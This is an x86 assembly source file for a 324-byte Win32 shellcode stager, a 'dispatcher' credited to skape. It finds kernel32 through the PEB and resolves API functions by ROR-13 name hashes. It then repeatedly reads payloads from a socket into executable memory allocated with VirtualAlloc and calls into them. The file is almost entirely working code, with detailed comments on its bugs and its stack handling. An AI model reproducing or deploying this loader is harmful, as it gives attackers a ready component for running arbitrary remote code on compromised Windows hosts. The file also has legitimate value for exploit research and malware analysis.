;
; Generic Win32 Dispatch Implementation (324 bytes)
;
; Approach:
;
;    1. Do standard symbol resolution & setup
;    2. Read in four bytes from the socket for the incoming payload length 
;       (recv)
;    3. Allocate a storage buffer for the payload  (VirtualAlloc)
;    4. Read the entire payload into the buffer (recv)
;    5. Call into the buffer, passing LoadLibraryA/GetProcAddress 
;    6. Deallocate the storage buffer (VirtualFree)
;    7. Loop to 2
;
; Bugs:
;
;    1. In the case of reading the payload length, recv could return less than
;       four bytes, in which case the length would not be completely read.
;       This can be fixed by adding chunked reads, or by asking Microsoft to
;       support MSG_WAITALL.
;
; Notes:
;
;    1. This expects the file descriptor in esi.
;
; skape
; mmiller@hick.org
; 04/2004
;

global _dispatcher_begin
global _dispatcher_end

section .text


;
; rsym <hash>, <offset>
;
; Resolve one exported symbol by hash and store its address in the symbol
; table at [ebp + offset].
;
;    In:   edx = base address of the module to search
;          ebp = base of the symbol table
;    Out:  eax = value returned by find_function, also stored at [ebp + offset]
;
; The two arguments pushed here are not removed afterwards: find_function
; returns with a plain 'ret' and the macro does not adjust esp, so each
; expansion leaves 8 bytes on the stack.
;
%macro rsym 2
	push  %1                         ; Second argument: hash of the symbol name
	push  edx                        ; First argument: module base address (from edx)
	call  find_function              ; eax = resolved address
	mov   [ebp+%2], eax              ; Store it in the slot at ebp + offset
%endmacro

;
; Entry point. Execution starts at the first byte, so hop over the helper
; routines that are laid out immediately after this label.
;
_dispatcher_begin:
	jmp   short startup              ; Jump past the symbol resolution functions

;
; Standard symbol resolution functions (PEB for kernel32)
;
;
; find_kernel32
;
; Locate a module base address by walking structures reachable from the PEB.
;
;    In:   nothing
;    Out:  eax = module base address
;    Regs: esi is saved and restored; eax and flags are modified
;
; NOTE(review): the NT path returns the base of the second entry in the
; initialization-order module list and assumes that entry is kernel32 --
; confirm this holds on every targeted Windows version.
;
find_kernel32:
	push  esi                        ; Save esi (used as the lodsd source below)
	xor   eax, eax                   ; eax = 0 so the next load can use [fs:eax+0x30]; presumably avoids a zero-filled 32-bit displacement
	mov   eax, [fs:eax+0x30]         ; eax = pointer to the PEB
	test  eax, eax                   ; Set SF from the top bit of the PEB pointer
	js    find_kernel32_9x           ; Top bit set: treated as Windows 9x, use the 9x lookup
find_kernel32_nt:
	mov   eax, [eax + 0x0c]          ; Extract the loader data pointer from the PEB
	mov   esi, [eax + 0x1c]          ; esi = first entry of the init-order module list (the list head's flink)
	lodsd                            ; eax = [esi]: that entry's forward link, i.e. the second entry
	mov   eax, [eax + 0x8]           ; Grab the module base address from the second entry
	jmp   short find_kernel32_fin    ; Skip the 9x path
find_kernel32_9x:
	mov   eax, [eax + 0x34]          ; Undocumented offset (0x34)
	lea   eax, [eax + 0x7c]          ; Advance by 0x7c so the next displacement fits in a signed byte
	mov   eax, [eax + 0x3c]          ; 0x7c + 0x3c = undocumented offset 0xb8 from the pointer loaded above
find_kernel32_fin:
	pop   esi                        ; Restore esi
	ret                              ; Return with the base address in eax

;
; find_function
;
; Look up an export of a loaded PE module by the hash of its name.
;
;    In:   [esp + 0x04] = module base address
;          [esp + 0x08] = requested hash
;    Out:  eax = absolute address of the matching export
;    Regs: every register except eax is preserved (pushad/popad)
;
; The hash starts at zero; for each byte of the name (terminator excluded)
; the accumulator is rotated right by 13 bits and the byte is added.
;
; The name table is scanned from the last entry down to the first. If no name
; matches, the saved eax is never overwritten, so the caller gets back
; whatever eax held on entry rather than a distinct failure value.
;
; The routine returns with a plain 'ret'; the two stack arguments are left
; for the caller to remove.
;
find_function:
	pushad                           ; Save all registers (0x20 bytes)
	mov   ebp, [esp + 0x24]          ; ebp = module base (first argument: 0x20 saved regs + return address)
	mov   eax, [ebp + 0x3c]          ; PE header relative offset
	mov   edx, [ebp + eax + 0x78]    ; Export table relative offset
	add   edx, ebp                   ; Export table VMA
	mov   ecx, [edx + 0x18]          ; Number of names
	mov   ebx, [edx + 0x20]          ; Names table relative offset
	add   ebx, ebp                   ; Names table VMA
find_function_loop:
	jecxz find_function_finished     ; No names left: give up without touching the saved eax
	dec   ecx                        ; ecx = index of the name to examine
	mov   esi, [ebx + ecx * 4]       ; Relative offset of that name
	add   esi, ebp                   ; esi = VMA of the current name
compute_hash:
	xor   edi, edi                   ; edi = hash accumulator, starts at zero
	xor   eax, eax                   ; Clear eax so the upper 24 bits stay zero when al is added
	cld                              ; Make lodsb walk forward
compute_hash_again:
	lodsb                            ; al = next byte of the name, esi advances
	test  al, al                     ; Null terminator?
	jz    compute_hash_finished      ; Yes: the hash is complete
	ror   edi, 0xd                   ; Rotate the accumulator 13 bits to the right
	add   edi, eax                   ; Add the new byte to the accumulator
	jmp   compute_hash_again         ; Next byte
compute_hash_finished:         ; edi = hash of the current name
find_function_compare:           ; Check it against the requested hash
	cmp   edi, [esp + 0x28]          ; Second argument: the requested hash
	jnz   find_function_loop         ; No match, try the next name
	mov   ebx, [edx + 0x24]          ; Ordinals table relative offset
	add   ebx, ebp                   ; Ordinals table VMA
	mov   cx, [ebx + 2 * ecx]        ; cx = ordinal for this name; only the low 16 bits of ecx are replaced
	mov   ebx, [edx + 0x1c]          ; Address table relative offset
	add   ebx, ebp                   ; Address table VMA
	mov   eax, [ebx + 4 * ecx]       ; Relative function offset, indexed by ordinal
	add   eax, ebp                   ; Function VMA
	mov   [esp + 0x1c], eax          ; Overwrite pushad's saved eax so popad returns the result
find_function_finished:
	popad                            ; Restore all registers (eax = result on a match)
	ret                              ; Return; arguments stay on the stack

;
; Setup: reserve a 0x1c-byte scratch area on the stack, point ebp at it and
; fill it with the addresses of the functions the dispatcher needs.
;
; ebp + 0x04 => payload length (written by recv in the dispatcher loop)
; ebp + 0x08 => LoadLibraryA
; ebp + 0x0c => GetProcAddress
; ebp + 0x10 => VirtualAlloc
; ebp + 0x14 => VirtualFree
; ebp + 0x18 => recv
;
; esp is never restored in this section: the scratch area, the two arguments
; left behind by every rsym expansion and the 8-byte library name all stay on
; the stack.
;
startup:
	sub   esp, byte 0x1c             ; Allocate storage for symbol addresses
	mov   ebp, esp                   ; ebp = base of the storage area
	
resolve_kernel32_symbols:
	call  find_kernel32              ; eax = kernel32's base address
	mov   edx, eax                   ; rsym expects the module base in edx

	rsym  0xec0e4e8e, 0x08           ; Resolve LoadLibraryA
	rsym  0x7c0dfcaa, 0x0c           ; Resolve GetProcAddress
	rsym  0x91afca54, 0x10           ; Resolve VirtualAlloc
	rsym  0x030633ac, 0x14           ; Resolve VirtualFree

resolve_winsock_symbols:
	xor   eax, eax                   ; Zero eax so the upper half supplies the string terminator
	mov   ax, 0x3233                 ; Low word = bytes 0x33 0x32, i.e. '32' in memory
	push  eax                        ; Push '32\0\0'
	push  0x5f327377                 ; Push 'ws2_' (bytes 0x77 0x73 0x32 0x5f in memory)
	mov   ebx, esp                   ; ebx = pointer to the string 'ws2_32'
	push  ebx                        ; Push the pointer as the argument
	call  [ebp + 0x08]               ; Call LoadLibraryA()
	mov   edx, eax                   ; rsym expects the module base in edx

	rsym  0xe71819b6, 0x18           ; Resolve recv

;
; The dispatcher loop
;
; Each iteration reads a four byte payload length from the socket, allocates
; an executable buffer of that size, reads the payload into it, calls it and
; frees the buffer again.
;
; Register and stack roles inside the loop:
;
;    esi        => socket descriptor
;    edi        => payload buffer returned by VirtualAlloc
;    ebx        => number of payload bytes received so far
;    ebp + 0x04 => payload length read from the socket
;    ebp + 0x08 .. ebp + 0x18 => resolved function addresses
;
; The loop ends when recv reports a closed connection (0) or an error
; (SOCKET_ERROR, -1), or when VirtualAlloc fails.
;
dispatcher_loop:

read_payload_length:
	xor   eax, eax                   ; Zero eax
	push  eax                        ; flags = 0
	mov   al, 0x04                   ; eax = 4
	push  eax                        ; len = 4 bytes
	lea   eax, [ebp + 0x04]          ; eax = address of the payload length slot
	push  eax                        ; buf = &length
	push  esi                        ; s = socket descriptor
	call  [ebp + 0x18]               ; Call recv()
	test  eax, eax                   ; recv returns 0 on close and -1 on error
	jle   dispatcher_loop_end        ; test always clears CF, so check ZF/SF instead of carry

allocate_storage:
	xor   eax, eax                   ; Zero eax
	inc   eax                        ; eax = 1
	shl   eax, 0x06                  ; eax = 0x40 (PAGE_EXECUTE_READWRITE)
	push  eax                        ; flProtect
	shl   eax, 0x06                  ; eax = 0x1000 (MEM_COMMIT)
	push  eax                        ; flAllocationType
	mov   eax, [ebp + 0x04]          ; eax = payload length
	push  eax                        ; dwSize
	xor   eax, eax                   ; Zero eax
	push  eax                        ; lpAddress = NULL, let the system pick
	call  [ebp + 0x10]               ; Call VirtualAlloc()
	test  eax, eax                   ; NULL means the allocation failed
	jz    dispatcher_loop_end        ; Jump to the end if we failed
	mov   edi, eax                   ; edi = payload buffer

read_payload:
	xor   ebx, ebx                   ; Nothing received yet
read_payload_chunk:
	xor   eax, eax                   ; Zero eax
	push  eax                        ; flags = 0
	mov   eax, [ebp + 0x04]          ; eax = payload length
	sub   eax, ebx                   ; Minus what has already arrived
	push  eax                        ; len = bytes still outstanding
	mov   eax, edi                   ; eax = start of the buffer
	add   eax, ebx                   ; Plus the current offset
	push  eax                        ; buf = next free byte
	push  esi                        ; s = socket descriptor
	call  [ebp + 0x18]               ; Call recv()
	test  eax, eax                   ; 0 = peer closed, negative = SOCKET_ERROR
	jle   dispatcher_loop_end        ; Stop instead of looping forever or moving the offset backwards
	add   ebx, eax                   ; Account for the bytes just received
	cmp   ebx, [ebp + 0x04]          ; Whole payload in the buffer?
	jne   read_payload_chunk         ; Not yet, read the next portion

;
; Call the payload as:
;
;    void payload(int fd, void *pbuf, HMODULE (*LoadLibraryA)(LPCSTR),
;                 FARPROC (*GetProcAddress)(HMODULE, LPCSTR));
;
; The four arguments are removed by this code after the call returns; esi and
; edi are reloaded from the first two argument slots on the way.
;
call_payload:
	mov   eax, [ebp + 0x0c]          ; eax = GetProcAddress
	push  eax                        ; Fourth argument
	mov   eax, [ebp + 0x08]          ; eax = LoadLibraryA
	push  eax                        ; Third argument
	push  edi                        ; Second argument: the buffer's absolute address
	push  esi                        ; First argument: the socket descriptor
	call  edi                        ; Call into the payload
	pop   esi                        ; Reload esi in case the payload changed it
	pop   edi                        ; Reload edi in case the payload changed it
	pop   eax                        ; Discard the LoadLibraryA argument
	pop   eax                        ; Discard the GetProcAddress argument

deallocate_storage:
	xor   eax, eax                   ; Zero eax
	inc   eax                        ; eax = 1
	shl   eax, 0x0f                  ; eax = 0x8000 (MEM_RELEASE); a 14 bit shift gives MEM_DECOMMIT
	push  eax                        ; dwFreeType = MEM_RELEASE
	xor   eax, eax                   ; Zero eax
	push  eax                        ; dwSize = 0, as MEM_RELEASE requires
	push  edi                        ; lpAddress = the payload buffer
	call  [ebp + 0x14]               ; Call VirtualFree()

repeat_loop:
	jmp   dispatcher_loop            ; Wait for the next payload

;
; Drop out.
;
; A failure inside read_payload arrives here without freeing the buffer.
;
; _dispatcher_end is placed before the 'ret', so the 'ret' lies outside the
; region delimited by _dispatcher_begin/_dispatcher_end. The stack is not
; unwound before it: the scratch area and the values pushed during setup are
; still on the stack at this point.
;
dispatcher_loop_end:

_dispatcher_end:
	ret
